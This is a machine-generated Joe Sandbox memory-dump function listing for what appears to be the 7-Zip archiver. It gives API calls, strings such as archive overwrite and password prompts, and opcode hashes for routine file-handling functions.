Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
Instruction ID: 015bb2fccec09ff8aac198d2bc5b44f580bfcfd0cc1d1db4f6399f9763818ff9
Opcode Fuzzy Hash: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
Instruction Fuzzy Hash: F631AC63715F8042DA20DF26D49035E6791EB96FE6B0C41E1FF6E17799CF19C44A8B40

Function 00B70554 Relevance: 11.4, APIs: 9, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00B596AC: free.MSVCRT ref: 00B596D1

free.MSVCRT ref: 00B705FD
free.MSVCRT ref: 00B70607
free.MSVCRT ref: 00B70612
free.MSVCRT ref: 00B70639
free.MSVCRT ref: 00B70643
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,00B72160), ref: 00B70652
free.MSVCRT ref: 00B70673
free.MSVCRT ref: 00B70692
free.MSVCRT ref: 00B706BC

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ErrorLast
String ID:
API String ID: 408039514-0
Opcode ID: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
Instruction ID: 1a63a4767b233279c0ce46889a884928841a4707d03c6285b548274c82a78023
Opcode Fuzzy Hash: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
Instruction Fuzzy Hash: CE317423325980C7C730EF25E89025AB7A0F7C6794F4451A6EB9E87B65DF39D859CB00

Function 00B8EAD4 Relevance: 11.3, APIs: 9, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00B8EAFF
memcmp.MSVCRT ref: 00B8EB1D
memcmp.MSVCRT ref: 00B8EB33

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
Instruction ID: 5834a9fb42795fea163b8507f10d660f4dc558ab4e19c293e696576cee3f549b
Opcode Fuzzy Hash: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
Instruction Fuzzy Hash: 43319CA130871191EF04EF26D8D23A823A5DB4AFD4FC890E1DE26A7226EF74DA45C305

Function 00B829F7 Relevance: 11.3, APIs: 9, Instructions: 52COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B82A09
free.MSVCRT ref: 00B82A13
free.MSVCRT ref: 00B82A1E
free.MSVCRT ref: 00B82A2C
free.MSVCRT ref: 00B82A4E
free.MSVCRT ref: 00B82A57
free.MSVCRT ref: 00B82A65
free.MSVCRT ref: 00B82A70
free.MSVCRT ref: 00B82D73

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
Instruction ID: 0ff665a50b996d68ad4ba52105a89f649b48e27a4d26fabf249a80f2a0a06bca
Opcode Fuzzy Hash: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
Instruction Fuzzy Hash: DC01DA6735B99045C611FB22E4A276F6791E7C3F92F0510E29F4E63715CE38C44ACB04

Function 00B83677 Relevance: 11.3, APIs: 9, Instructions: 48COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B8367E
free.MSVCRT ref: 00B83688
free.MSVCRT ref: 00B83693
free.MSVCRT ref: 00B836A1
free.MSVCRT ref: 00B836C8
free.MSVCRT ref: 00B836D1
free.MSVCRT ref: 00B836DF
free.MSVCRT ref: 00B836EA
free.MSVCRT ref: 00B836F8

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
Instruction ID: 638129700bc3dc4bc69d08d80ced211e8f30d4e8af999f32fad46feae72251f4
Opcode Fuzzy Hash: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
Instruction Fuzzy Hash: 5101A46335798045CA11FF26E46176F6390EBC7B92F0510E2AF4E63721DE38C48BCA08

Function 00B968FC Relevance: 11.3, APIs: 9, Instructions: 45COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B9692E
free.MSVCRT ref: 00B96937
free.MSVCRT ref: 00B96940
free.MSVCRT ref: 00B96949
free.MSVCRT ref: 00B96952
free.MSVCRT ref: 00B9695B
free.MSVCRT ref: 00B96964
free.MSVCRT ref: 00B9696D
free.MSVCRT ref: 00B96975

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
Instruction ID: f0900aafaed6ecc96b6f6abdb9546ae9710a7f37ecf586e600bb28fee1bc51a2
Opcode Fuzzy Hash: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
Instruction Fuzzy Hash: DA011A23713D8089CA10EF36DC9126A23A0EB87B9A71841F2BF1D5B725DE20CC5A8740

Function 00B5F0C8 Relevance: 11.3, APIs: 9, Instructions: 44COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B5F0FA
free.MSVCRT ref: 00B5F103
free.MSVCRT ref: 00B5F10C
free.MSVCRT ref: 00B5F115
free.MSVCRT ref: 00B5F11E
free.MSVCRT ref: 00B5F127
free.MSVCRT ref: 00B5F130
free.MSVCRT ref: 00B5F139
free.MSVCRT ref: 00B5F141

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
Instruction ID: 08f9867b2c58ce82eb1ffb1d3dc92c214e359ea92e1409eef43528056fc01f4b
Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
Instruction Fuzzy Hash: 68011A63713D808ACB10BF36DC9136967A0EB86B9AB1841F1BF2D6B755DE60C84A8744

Function 00B9C844 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 195COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B9C91C
fputs.MSVCRT ref: 00B9C9F1

Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232

Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

fputs.MSVCRT ref: 00B9CADA

Part of subcall function 00B522E4: fflush.MSVCRT ref: 00B522EB

Strings

ERROR: , xrefs: 00B9CAD3
WARNINGS:, xrefs: 00B9C9C2, 00B9C9EA
ERRORS:, xrefs: 00B9C8ED, 00B9C915

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$free$fflushfputcmemset
String ID: ERROR: $ERRORS:$WARNINGS:
API String ID: 2975459029-4064182643
Opcode ID: 0028e4c7587573bd9f515618cfbb5301f3e1817b887f44ee0e76695e23076ce5
Instruction ID: c82917c9ae0aefe2926f429d8e4bd3a08e7ea0fb65e8e4af3af9a272a82ef2dd
Opcode Fuzzy Hash: 0028e4c7587573bd9f515618cfbb5301f3e1817b887f44ee0e76695e23076ce5
Instruction Fuzzy Hash: D5617A66301A859ACE39EB72E59137E7B91F746B80F4880F6DF1F07602DF28D8988354

Function 00B85680 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 181COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B85737
free.MSVCRT ref: 00B85907
free.MSVCRT ref: 00B85911

Strings

: , xrefs: 00B8574A
Junction: , xrefs: 00B85707
REPARSE:, xrefs: 00B857DF
..., xrefs: 00B858F2

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID: : $...$Junction: $REPARSE:
API String ID: 1294909896-1476144188
Opcode ID: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
Instruction ID: c822c53b926a2fd8a4ebd10c2bbc6a9241f5e80bc58df3d1809f643740920a91
Opcode Fuzzy Hash: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
Instruction Fuzzy Hash: 0451F422214A0492CF20EF25E89136E77E1FB81BE5F8490A6EE8747764DF78C549CB10

Function 00B90E6C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00B90E9C

Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2

fputs.MSVCRT ref: 00B90F5D
fputs.MSVCRT ref: 00B90FD8
fputs.MSVCRT ref: 00B90FF4
LeaveCriticalSection.KERNEL32 ref: 00B91092

Strings

???, xrefs: 00B90EC3

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$CriticalSection$EnterLeavefreememmove
String ID: ???
API String ID: 2578255354-1053719742
Opcode ID: be1a40be557d259925390312d71c451b002569341349d622961d0d476c9d9d15
Instruction ID: b8f9245d09066f0c04f6ad30ae918c9ef1c336238d799e9b4228715dadd83f18
Opcode Fuzzy Hash: be1a40be557d259925390312d71c451b002569341349d622961d0d476c9d9d15
Instruction Fuzzy Hash: 9B519E32310A81A6DE18EB25DA903ED73A0F785B95F4485A2DF2D47760DF78D9A9C300

Function 00B90C64 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00B90C95
fputs.MSVCRT ref: 00B90CF7
fputs.MSVCRT ref: 00B90D23
LeaveCriticalSection.KERNEL32 ref: 00B90E38

Strings

with the file from archive:, xrefs: 00B90D1C
Would you like to replace the existing file:, xrefs: 00B90CF0

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CriticalSectionfputs$EnterLeave
String ID: Would you like to replace the existing file:$with the file from archive:
API String ID: 3346953513-686978020
Opcode ID: 7412e7fb1b6ccc606eca1224af26252d797eb43481bfe92c889a2551bdc217a5
Instruction ID: 165f3ad9dea0910cdb9139aeb9257b478a20cdeae48afb3dc3dc0ed44a1687ae
Opcode Fuzzy Hash: 7412e7fb1b6ccc606eca1224af26252d797eb43481bfe92c889a2551bdc217a5
Instruction Fuzzy Hash: F8411862364B829ADF28AF65D8903A873E0FB85B90F4481729F6D47751CF3CD898D305

Function 00B912B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00B912DC
fputs.MSVCRT ref: 00B9137C
fputs.MSVCRT ref: 00B9139C
free.MSVCRT ref: 00B913D3
LeaveCriticalSection.KERNEL32 ref: 00B913EB

Strings

: , xrefs: 00B91395

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: CriticalSectionfputs$EnterLeavefree
String ID: :
API String ID: 1989314732-3653984579
Opcode ID: a9e7b779069d7613123e0b6a527abe8c78201bf88696ae9abb195fc48f8ffdd4
Instruction ID: 955637328f50edf78d69ffe411faaf0b4cc9ac0b600d19fae1e5bb15a00b7231
Opcode Fuzzy Hash: a9e7b779069d7613123e0b6a527abe8c78201bf88696ae9abb195fc48f8ffdd4
Instruction Fuzzy Hash: C2316D76204A4191DB11DF29D8403AD33B0F789FA8F484672DE5D4B7A8CF78C889D314

Function 00B9CE50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B9CE70

Part of subcall function 00B522E4: fflush.MSVCRT ref: 00B522EB

GetStdHandle.KERNEL32 ref: 00B9CE83
GetConsoleMode.KERNEL32 ref: 00B9CEAA
SetConsoleMode.KERNEL32 ref: 00B9CEBE
SetConsoleMode.KERNEL32 ref: 00B9CEE8

Strings

Enter password (will not be echoed):, xrefs: 00B9CE69

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ConsoleMode$Handlefflushfputs
String ID: Enter password (will not be echoed):
API String ID: 108775803-3720017889
Opcode ID: b3b14cee00391645aedadfe40ccae594c45a57101052151f518e341e407f9c9a
Instruction ID: 2dadb777be9da65d17147974a217afde5010ad2b84b5c808d35c2cd7654cc644
Opcode Fuzzy Hash: b3b14cee00391645aedadfe40ccae594c45a57101052151f518e341e407f9c9a
Instruction Fuzzy Hash: BE21C82230660183EE189B65A95473937E1EB497F1F1852B1EF1B873E5DF6CC889C300

Function 00B91AA8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B91ACD
free.MSVCRT ref: 00B91B97

Strings

WARNING:, xrefs: 00B91AC6
Can not open the file, xrefs: 00B91B34
The archive is open with offset, xrefs: 00B91B02
The file is open, xrefs: 00B91B60

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputsfree
String ID: Can not open the file$The archive is open with offset$The file is open$WARNING:
API String ID: 2581285248-3393983761
Opcode ID: 508089e93e5762c25ef1d7ab05736a957ed921444384873a384d5238f926eb99
Instruction ID: 9db151f8898780f6cedf4df03f90388b262bed99ee4b7340687f630863fc8bd2
Opcode Fuzzy Hash: 508089e93e5762c25ef1d7ab05736a957ed921444384873a384d5238f926eb99
Instruction Fuzzy Hash: C221C86330190699CE21DF25E85039D37A0F7CABE5F4452A1EF1E43365EF28C54AC700

Function 00B87614 Relevance: 10.2, APIs: 8, Instructions: 196COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B87668
free.MSVCRT ref: 00B87670
free.MSVCRT ref: 00B87882
free.MSVCRT ref: 00B8789D

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
Instruction ID: 1d0784442040721e9040a46c1da9ca7e6f794c30f21edf9c62ba0b815361b135
Opcode Fuzzy Hash: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
Instruction Fuzzy Hash: 0A71D52325DAC086C621EB25E44079FB7E1F7CA754F645192EBD953B69CF38C949CB00

Function 00B7BB68 Relevance: 10.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B7BBD6
free.MSVCRT ref: 00B7BC04

Part of subcall function 00B53404: free.MSVCRT ref: 00B53431
Part of subcall function 00B53404: memmove.MSVCRT ref: 00B5344C

free.MSVCRT ref: 00B7BC1D
free.MSVCRT ref: 00B7BC33
free.MSVCRT ref: 00B7BC41
free.MSVCRT ref: 00B7BCFA
free.MSVCRT ref: 00B7BD0E

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
Instruction ID: 62981dbc68ed6c717c3577b5aaaaf2e97a23493a5848d6dbd03258b719a9febc
Opcode Fuzzy Hash: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
Instruction Fuzzy Hash: F641052320968494CF32AF39D441BAA37E0D792B98F14C1D1EE6E07795DF79C68ACB01

Function 00B70A58 Relevance: 10.1, APIs: 8, Instructions: 90COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00B70A91
free.MSVCRT ref: 00B70A99

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

memmove.MSVCRT ref: 00B70AD4
free.MSVCRT ref: 00B70ADD
memmove.MSVCRT ref: 00B70B19
free.MSVCRT ref: 00B70B22
memmove.MSVCRT ref: 00B70B5B
free.MSVCRT ref: 00B70B64

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: freememmove$ExceptionThrowmalloc
String ID:
API String ID: 1818558235-0
Opcode ID: 765776f35c77edad6c13728d38dc7fcf5a9f6dac0127373448571f55f4189822
Instruction ID: e1e857041e7aed522ecdaf406d2fb4ae44b45010d163df4c6bb0585009f3b45c
Opcode Fuzzy Hash: 765776f35c77edad6c13728d38dc7fcf5a9f6dac0127373448571f55f4189822
Instruction Fuzzy Hash: 4D3161B27226508B8B64EF7BD49251E73E4E745FD871480A6DF2D97708DA30DC82CB80

Function 00B83162 Relevance: 10.0, APIs: 8, Instructions: 42COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B83174
free.MSVCRT ref: 00B8317E
free.MSVCRT ref: 00B83189
free.MSVCRT ref: 00B83197
free.MSVCRT ref: 00B831C0
free.MSVCRT ref: 00B831C9
free.MSVCRT ref: 00B831D7
free.MSVCRT ref: 00B831E2

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
Instruction ID: 89d6b6d9bc9d173c96194450e89de6d6f29aec721bba80d4ce3822a221c850b5
Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
Instruction Fuzzy Hash: 63F0976235B99585CA14FF32C49566F6791EBC7F82B0524E1AF4E73725DE28C40ACA04

Function 00B830A8 Relevance: 10.0, APIs: 8, Instructions: 41COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B830BA
free.MSVCRT ref: 00B830C4
free.MSVCRT ref: 00B830CF
free.MSVCRT ref: 00B830DD
free.MSVCRT ref: 00B83104
free.MSVCRT ref: 00B8310D
free.MSVCRT ref: 00B8311B
free.MSVCRT ref: 00B83126

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

